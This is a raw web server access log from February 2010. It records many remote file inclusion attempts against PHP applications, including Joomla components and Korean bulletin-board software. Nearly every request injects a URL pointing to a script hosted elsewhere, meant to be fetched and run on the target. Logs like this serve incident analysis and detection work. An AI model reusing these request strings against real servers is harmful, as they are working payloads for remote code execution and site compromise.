61.63.82.14 - - [12/Feb/2010:08:51:29 -0800] "GET /logs/access_100115.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:51:29 -0800] "GET /logs/access_100107.log%20%20/?path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:51:30 -0800] "GET /logs/?path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:51:30 -0800] "GET /?path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:08:52:05 -0800] "GET /logs/access_100119.log%20%20//bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:08:52:05 -0800] "GET /bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:08:52:05 -0800] "GET /logs//bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [12/Feb/2010:08:52:20 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [12/Feb/2010:08:52:20 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [12/Feb/2010:08:52:21 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:08:52:24 -0800] "GET /logs/access_100109.log%20%20//bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:08:53:13 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.olir.it/areetematiche/67/ahhe.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:08:53:13 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.olir.it/areetematiche/67/ahhe.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:53:56 -0800] "GET /logs/access_100202.log%20%20//////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:54:16 -0800] "GET /logs/access_100202.log%20%20//delete_comment.php?board_skin_path=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:08:54:25 -0800] "GET /logs/access_100120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [12/Feb/2010:08:54:33 -0800] "GET /logs/access_100120.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:08:54:35 -0800] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:08:54:48 -0800] "GET /logs/access_100120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:08:54:59 -0800] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:55:48 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:55:48 -0800] "GET /logs/access_100107.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:55:48 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:56:15 -0800] "GET /logs/access_100202.log%20%20//////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:08:56:35 -0800] "GET /become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:08:56:35 -0800] "GET /logs/access_100127.log/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:08:56:35 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:08:56:35 -0800] "GET /logs/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [12/Feb/2010:08:57:07 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.puaga.com"
208.93.149.176 - - [12/Feb/2010:08:57:07 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.puaga.com"
208.93.149.176 - - [12/Feb/2010:08:57:07 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://giftgives.com/txt?%0D?&u=x HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
208.93.149.176 - - [12/Feb/2010:08:57:07 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://giftgives.com/txt?%0D?&u=x HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:08:57:43 -0800] "GET /logs/access_100109.log//bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:59:11 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:59:12 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:59:12 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:09:00:29 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:09:00:29 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:09:00:29 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:09:00:43 -0800] "GET /logs/access_100119.log%20%20//bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:09:00:43 -0800] "GET /logs//bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:09:00:53 -0800] "GET /logs/access_100127.log%20%20/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:09:00:56 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:09:00:58 -0800] "GET /logs/access_100109.log%20%20//bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:09:01:11 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:01:30 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:01:30 -0800] "GET /logs/access_100120.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:01:30 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:01:44 -0800] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:09:02:53 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:09:02:53 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:09:02:53 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [12/Feb/2010:09:03:05 -0800] "GET /logs//?_zb_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [12/Feb/2010:09:03:05 -0800] "GET /logs/access_100112.log//?_zb_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [12/Feb/2010:09:03:05 -0800] "GET /?_zb_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:09:03:43 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:09:04:33 -0800] "GET /gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:09:04:33 -0800] "GET /logs/access_100202.log%20%20//gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:09:04:33 -0800] "GET /logs//gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:09:04:38 -0800] "GET /logs/access_100121.log%20%20//gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:09:04:40 -0800] "GET /logs//gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:09:04:40 -0800] "GET /gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:09:04:40 -0800] "GET /logs/access_100202.log%20%20//gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:09:04:44 -0800] "GET /logs/access_100121.log%20%20//gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [12/Feb/2010:09:05:02 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [12/Feb/2010:09:05:02 -0800] "GET /logs/access_100118.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [12/Feb/2010:09:05:02 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [12/Feb/2010:09:05:07 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [12/Feb/2010:09:05:07 -0800] "GET /logs/access_100118.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [12/Feb/2010:09:05:07 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [12/Feb/2010:09:05:08 -0800] "GET /logs/access_100118.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [12/Feb/2010:09:05:08 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [12/Feb/2010:09:05:08 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:25 -0800] "GET /logs//e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:25 -0800] "GET /e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:25 -0800] "GET /logs/access_100112.log%20%20//e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:30 -0800] "GET /logs/access_100103.log%20%20//e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:05:37 -0800] "GET /logs////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 200 4810 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:05:37 -0800] "GET /logs/access_100203.log%20%20////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:05:37 -0800] "GET ///////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:39 -0800] "GET /logs/access_100112.log%20%20//e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:40 -0800] "GET /e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:40 -0800] "GET /logs//e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:05:41 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:42 -0800] "GET /logs/access_100112.log%20%20//e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:42 -0800] "GET /e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:42 -0800] "GET /logs//e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:43 -0800] "GET /e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:43 -0800] "GET /logs/access_100112.log%20%20//e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:43 -0800] "GET /logs/access_100112.log%20%20//e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:43 -0800] "GET /logs//e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:43 -0800] "GET /e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:43 -0800] "GET /logs//e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:46 -0800] "GET /logs/access_100103.log%20%20//e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:47 -0800] "GET /logs/access_100103.log%20%20//e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:48 -0800] "GET /logs/access_100103.log%20%20//e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:05:50 -0800] "GET /logs/access_100103.log%20%20//e404.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:09:06:04 -0800] "GET /logs/access_100126.log%20%20//gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [12/Feb/2010:09:06:04 -0800] "GET /logs/?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 200 4799 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.puaga.com"
208.93.149.176 - - [12/Feb/2010:09:06:04 -0800] "GET /logs/?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://giftgives.com/txt?%0D?&u=x HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
208.93.149.176 - - [12/Feb/2010:09:06:05 -0800] "GET /?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 200 3642 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.puaga.com"
208.93.149.176 - - [12/Feb/2010:09:06:05 -0800] "GET /?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://giftgives.com/txt?%0D?&u=x HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:09:06:05 -0800] "GET /logs/access_100126.log%20%20//gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:09:06:11 -0800] "GET /logs/access_100128.log%20%20//gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:09:06:13 -0800] "GET /logs/access_100128.log%20%20//gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:06:13 -0800] "GET /logs/access.log%20%20////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
